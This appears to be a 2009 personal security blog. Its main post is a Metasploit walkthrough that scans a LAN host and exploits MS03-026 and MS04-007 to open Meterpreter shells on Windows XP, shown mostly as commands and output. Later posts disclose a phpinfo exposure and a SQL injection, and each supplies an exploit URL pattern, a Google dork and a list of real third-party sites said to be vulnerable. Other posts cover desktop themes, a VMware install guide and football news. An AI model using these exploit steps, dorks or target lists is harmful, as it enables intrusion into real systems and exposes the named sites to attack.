Metasploit Proof of Concept [ Linux ]  

Saturday, June 27, 2009

this is an old exploit but still works
i have test it on Local Area Network here
this exploit tested on Windows XP Service Pack 1

[o] DCOM RPC Exploit (ms03_026_dcom)

# Description
This module exploits a stack overflow in the RPCSS service, this
vulnerability was originally found by the Last Stage of Delirium
research group and has bee widely exploited ever since. This module
can exploit the English versions of Windows NT 4.0 SP3-6a, Windows
2000, Windows XP, and Windows 2003 all in one request :)


root@ubuntu:~# ping 172.16.1.31
PING 172.16.1.31 (172.16.1.31) 56(84) bytes of data.
64 bytes from 172.16.1.31: icmp_seq=1 ttl=128 time=2.09 ms
64 bytes from 172.16.1.31: icmp_seq=2 ttl=128 time=0.335 ms
64 bytes from 172.16.1.31: icmp_seq=3 ttl=128 time=0.342 ms
^C
--- 172.16.1.31 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2005ms
rtt min/avg/max/mdev = 0.335/0.922/2.091/0.826 ms

root@ubuntu:~# nmap -O -PN 172.16.1.31

Starting Nmap 4.62 ( http://nmap.org ) at 2009-06-21 09:56 WIT
Interesting ports on ******-******.kapukvalley.net (172.16.1.31):
Not shown: 1710 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
5000/tcp open  upnp
MAC Address: 00:1C:F0:5A:98:AF (D-Link)
Device type: general purpose
Running: Microsoft Windows 2000
OS details: Microsoft Windows 2000 SP0/SP1/SP2 or Windows XP SP0/SP1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.860 seconds

root@ubuntu:~# cd /home/noge/pentest/metasploit/
root@ubuntu:/home/noge/pentest/metasploit# ./msfconsole

            |                    |      _) |
__ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
|   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                          _|               


   =[ msf v3.3-dev
+ -- --=[ 378 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
   =[ 154 aux

msf > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms03_026_dcom) > show options

Module options:

Name   Current Setting  Required  Description     
----   ---------------  --------  -----------     
RHOST                   yes       The target address
RPORT  135              yes       The target port 


Payload options (windows/meterpreter/bind_tcp):

Name      Current Setting  Required  Description                       
----      ---------------  --------  -----------                       
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LPORT     4444             yes       The local port                    
RHOST                      no        The target address                


Exploit target:

Id  Name                                  
--  ----                                  
0   Windows NT SP3-6a/2000/XP/2003 Universal


msf exploit(ms03_026_dcom) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms03_026_dcom) > set TARGET 0
TARGET => 0
msf exploit(ms03_026_dcom) > show options

Module options:

Name   Current Setting  Required  Description     
----   ---------------  --------  -----------     
RHOST  172.16.1.31      yes       The target address
RPORT  135              yes       The target port 


Payload options (windows/meterpreter/bind_tcp):

Name      Current Setting  Required  Description                       
----      ---------------  --------  -----------                       
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LPORT     4444             yes       The local port                    
RHOST     172.16.1.31      no        The target address                


Exploit target:

Id  Name                                  
--  ----                                  
0   Windows NT SP3-6a/2000/XP/2003 Universal


msf exploit(ms03_026_dcom) > exploit

[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:172.16.1.31[135] ...
[*] Sending exploit ...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] The DCERPC service did not reply to our request
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (172.16.1.12:38423 -> 172.16.1.31:4444)

meterpreter > pwd
C:\WINDOWS\system32
meterpreter > sysinfo
Computer: ******-******
OS      : Windows XP (Build 2600, Service Pack 1).
meterpreter >


=============================================================================================
=============================================================================================


[o] KILLBILL SMB Exploit (ms04_007_killbill)

# Description
This is an exploit for a previously undisclosed vulnerability in the
bit string decoding code in the Microsoft ASN.1 library. This
vulnerability is not related to the bit string vulnerability
described in eEye advisory AD20040210-2. Both vulnerabilities were
fixed in the MS04-007 patch. You are only allowed one attempt with
this vulnerability. If the payload fails to execute, the LSASS
system service will crash and the target system will automatically
reboot itself in 60 seconds. If the payload succeeeds, the system
will no longer be able to process authentication requests, denying
all attempts to login through SMB or at the console. A reboot is
required to restore proper functioning of an exploited system. This
exploit has been successfully tested with the win32/*/reverse_tcp
payloads, however a few problems were encounted when using the
equivalent bind payloads. Your mileage may vary.


msf > use windows/smb/ms04_007_killbill
msf exploit(ms04_007_killbill) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms04_007_killbill) > show options

Module options:

Name   Current Setting  Required  Description                     
----   ---------------  --------  -----------                     
PROTO  smb              yes       Which protocol to use: http or smb
RHOST                   yes       The target address              
RPORT  445              yes       Set the SMB service port        


Payload options (windows/meterpreter/bind_tcp):

Name      Current Setting  Required  Description                       
----      ---------------  --------  -----------                       
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LPORT     4444             yes       The local port                    
RHOST                      no        The target address                


Exploit target:

Id  Name                                   
--  ----                                   
0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1


msf exploit(ms04_007_killbill) > set RHOST 172.16.1.31
RHOST => 172.16.1.31
msf exploit(ms04_007_killbill) > show targets

Exploit targets:

Id  Name                                   
--  ----                                   
0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1


msf exploit(ms04_007_killbill) > set TARGET 0
TARGET => 0
msf exploit(ms04_007_killbill) > show options

Module options:

Name   Current Setting  Required  Description                     
----   ---------------  --------  -----------                     
PROTO  smb              yes       Which protocol to use: http or smb
RHOST  172.16.1.31      yes       The target address              
RPORT  445              yes       Set the SMB service port        


Payload options (windows/meterpreter/bind_tcp):

Name      Current Setting  Required  Description                       
----      ---------------  --------  -----------                       
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LPORT     4444             yes       The local port                    
RHOST     172.16.1.31      no        The target address                


Exploit target:

Id  Name                                   
--  ----                                   
0   Windows 2000 SP2-SP4 + Windows XP SP0-SP1


msf exploit(ms04_007_killbill) > exploit

[*] Started bind handler
[*] Error: The server responded with error: STATUS_ACCESS_VIOLATION (Command=115 WordCount=0)
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 3 opened (172.16.1.12:33484 -> 172.16.1.31:4444)

meterpreter > sysinfo
Computer: ******-******
OS      : Windows XP (Build 2600, Service Pack 1).
meterpreter >

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

2BGal 3.1.2 phpinfo() Disclosure Vuln  

Thursday, June 25, 2009

[o] 2BGal 3.1.2 phpinfo() Disclosure Vulnerability
Software : 2BGal version 3.1.2
Vendor   : http://www.ben3w.com/
Download : http://www.ben3w.com/multimedia/devphp_2bgal.php
Author   : NoGe

[o] Vulnerable file
admin/phpinfo.php

[o] Exploit
http://localhost/[path]/admin/phpinfo.php

[o] Proof Of Concept
http://www.montefiore.ulg.ac.be/ieee/2bgal/admin/phpinfo.php
http://www.tavakathamritam.net/gallery/admin/phpinfo.php
http://www.bfloortheatre.com/photo/admin/phpinfo.php
http://sunnysidealpacaranch.ca/album/admin/phpinfo.php

[o] Dork
"powered by 2bgal"

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

Think Ubuntu Ver 1.0 GDM Theme   

background 1600x1200

[o] download Think Ubuntu Ver 1.0

do you think about ubuntu?? :D

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

Pelangi Ver 1.0 GDM Theme  

Thursday, June 18, 2009

rainbow GDM Theme (1024x768)
background by seppoftw from Deviantart

[o] download Pelangi Version 1.0

[o] download the background here

if you have any opinion please leave a comment



enjoy the theme!! :)

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

Awan Biru Ver 1.0 GDM Theme  

Tuesday, June 16, 2009

ubuntu GDM Theme with 1024x768 backgroud
background created by LightDesgins from Deviantart

[o] download Awan Biru Version 1.0

[o] download the background here

hopefully you like it.. ^^

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

Another GDM Themes  

Saturday, June 13, 2009

another GDM Theme for ubuntu.

[o] Absolut Hacker

gnome-look
ubuntu-art

[o] The Matrix

gnome-look
ubuntu-art

[o] Dinosaur

gnome-look
ubuntu-art

enjoy the theme!! ^^

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

Transformers GDM Theme Version 1.0  

Thursday, June 11, 2009

this is my first simple GDM Theme for Ubuntu.
more GDM Theme will be post.

download the Transformers GDM Theme

how to install it?

System >> Administration >> Login Window
go to Local tab
drag the .tar.gz file into the box and click Install
or you can click + Add... and search the file than click Install

another way to install it.

extract the .tar.gz file and paste it into /usr/share/gdm/themes

i hope you like it.. enjoy the theme!! ^^



./NoGe

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

PERSIPURA JAYAPURA CHAMPION OF INDONESIAN SUPER LEAGUE  

Wednesday, June 10, 2009

Persipura Jayapura berhasil mengukuhkan statusnya sebagai jawara Liga
Super Indonesia (LSI) musim ini. Tak tanggung-tanggung, juara bertahan
Sriwijaya FC berhasil ditekuk 4-1.

Tak hanya itu, Boaz yang berhasil mencetak dua gol untuk sementara
berhasil mengambil alih daftar top skorer yang sebelumnya dipegang
Cristian 'El Loco' Gonzales.
Torehan gol Boaz menjadi 27 atau unggul satu gol dari El Loco.

Bertanding di Stadion Mandala, Jayapura, membuat Tim Mutiara Hitam terlihat lebih
mudah beradaptasi dengan kondisi ruput yang tidak rata. Terlebih dukungan penonton
yang memenuhi stadion membuat Boaz Sajojo Solossa cs tampil lebih ngotot.

Setelah membuat beberapa peluang lewat Alberto 'Beto' Goncalves dan
Boaz Solossa, Tim Mutiara Hitam akhirnya berhasil membuka gol lewat Beto.
Pada menit ke-23, Persipura mendapat hadiah penalti setelah bola yang coba
ditanduk bek Sriwijaya Tsimi J Joel justru mendarat di tangannya.

Wasit Yandri langsung menunjuk titik putih. Meski Boaz gagal mengeksekusi penalti,
Beto berhasil menyambar bola sekaligus menaklukkan Ferry Rotinsulu.
1-0 buat Persipura. Gol pembuka itu seakan melecut Tim Mutiara Hitam.
Tehitung dua peluang cantik dibuat Boaz dan Beto sempat mengancam gawang Ferry.

Stadion Mandala kembali bergemuruh setelah Ernest Jeremiah berhasil
menggandakan keunggulan di menit ke-38. Beto kali ini menjadi kreator
setelah berhasil menyodorkan bola ke Iank Kabes yang berdiri bebas di
kiri pertahanan Sriwijaya. Kaber akhirnya menyodorkan bola ke Jeremiah
yang dengan tenang menaklukkan Ferry.

Kedudukan 2-0 ini bertahan hingga turun minum meski Sriwijaya sempat
mempunyai peluang memperkecil ketinggalan di menit ke-41.
Sayangnya, tendangan bebas Ngon A Djam masih membentur tiang gawang Persipura
yang dijaga Jendry Pitoy.

Memasuki babak kedua Persipura tak mengendorkan serangan. Sriwijaya
FC sebenarnya berpeluang memperkecil ketinggalan setelah mendapat
hadiah penalti di menit ke-61. Namun tendangan Ngon A Djam berhasil
digagalkan Jendry.

Rupanya babak kedua menjadi milik seorang Boaz Sajojo Solossa.
Pada menit ke-64, Boas berhasil mencetak gol pertamanya di pertandingan itu.
Umpan matang Ian Kabes di sisi kanan pertahan Laskar Wong Kito berhasil dilanjutkan
Boaz dengan tandukan keras.

Unggul 3-0 tak membuat Persipura puas. Boaz kembali berhasil memperdayai Ferry Rotinsulu,
tiga menit usai gol pertamanya. Umpan Beto ke dalam kotak penalti berhasil diteruskan
dengan tendangan keras Boas sekaligus membuat tim Mutiara Hitam unggul 4-0.

Sriwijaya hanya bisa memperkecil ketinggalan setelah pemain pengganti Budi
Sudarsono berhasil mencetak gol di menit ke-86. Kedudukan 4-1 ini
bertahan hingga pertandingan usai.
Dengan hasil ini maka Persipura menutup musim ini dengan total poin
80 dari 25 kemenangan, 5 imbang dan hanya menelan 4 kekalahan.

taken from http://bola.vivanews.com/news/read/65320-tekuk_sriwijaya__persipura_layak_juara

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

Sinojet SQL Injection Vuln  

Tuesday, June 9, 2009

[o] Sinojet SQL Injection Vulnerability
Software : Sinojet Script
Vendor   : http://www.sinojet.net/
Author   : NoGe

[o] Vulnerable file
product.php

[o] Exploit
http://localhost/[path]/product.php?id=[SQL]

[o] Proof Of Concept
http://www.wuzhoushanwang.com/en/product.php?id=1
http://www.guangchengal.com/en/product.php?id=9
http://www.gdtengfei.com/en/product.php?id=6

[o] Dork
"Powered by Sinojet"

[o] Note
private shop script again. -_-
if there is no result, try to inject with schemafuzz. :)
dont have schemafuzz?? you can download it here

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

How to install VMware Server on ubuntu 8.10  

Wednesday, June 3, 2009


first of all u must download the VMware Server from here after you open that then click Download.
in the next page, if you already a VMware member you can login with your email and password if not create a new one.
just follow all instruction there. at the end you will recieve an email with download page link and VMware license key.
there is two license key, one for a Windows and one for a Linux. save the license key brotha!!
then download the VMware server. remember download the TAR file not the RPM file!!

after download it now you have to install some necessary packages first before installing VMware server.

# apt-get install linux-headers-`uname -r` build-essential xinetd

now extract the VMware server file. [ for example my VMware server 2.0.1 ]

# tar -zxvf VMware-server-2.0.1-156745.i386.tar.gz

go to vmware-server-distrib directory

# cd vmware-server-distrib

run the instalation file

# ./vmware-install.pl

the installer will ask you a lot of questions, you can always accept the default values by press ENTER.
or you can specify a location that has enough free space to store your virtual machines.
at the end of the installation, you will be asked to enter a serial number.

Please enter your 20-character serial number.

Type XXXXX-XXXXX-XXXXX-XXXXX or 'Enter' to cancel:

fill in your serial number for VMware Server and press ENTER.
after the successful installation, you can delete the installation directory

# rm -rf vmware-server-distrib

if you accepted all default values during the installation, root is now the VMware Server login name.
on ubuntu, root has no password by default so you can set root password with this command

# passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

you can access the management interface over HTTPS (https://:8333) or HTTP (http://:8222)
the management interface can be accessed locally and also remotely.
if you want to access it from the same machine, type https://127.0.0.1:8333 or http://127.0.0.1:8222 into the browser address bar.
if you're using firefox 3 and use HTTPS, firefox will complain about the self-signed certificate.
you must set firefox to accept the certificate.

after you open https://127.0.0.1:8333 there will be an error message like this

Secure Connection Failed

127.0.0.1:8333 uses an invalid security certificate.

The certificate is not trusted because it is self signed.
The certificate is only valid for ubuntu

(Error code: sec_error_ca_cert_invalid)

bla..bla..bla..

click Or you can add an exception...
click Add Exception...
click Get Certificate
click Confirm Security Exception

after that, you will see the VMware Server login form. Type in root and your root password
start configuring your VMware!!

[o] Documentation

http://google.co.id
http://howtoforge.com
http://vmware.com



./NoGe

Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 1 comments

Links to this post

Linux Download Link  

Tuesday, June 2, 2009


indonesian Linux ISO and Repository Mirror

ftp://dl2.foss-id.web.id/iso/

ftp://mirror.its.ac.id/ISO/

ftp://ftp.itb.ac.id/

http://ubuntu.pesat.net.id/

http://mirror.unej.ac.id/site/

http://ubuntu.biz.net.id/

http://kambing.ui.ac.id/iso/

http://repo.ugm.ac.id/iso/

http://jaran.undip.ac.id/iso/

http://kebo.vlsm.org/ISO/

http://komo.vlsm.org/


Read More...

AddThis Social Bookmark Button

Posted in by NoGe | 0 comments

Links to this post

Subscribe to: Posts (Atom)

[d]esign by Amanda [e]dited by NoGe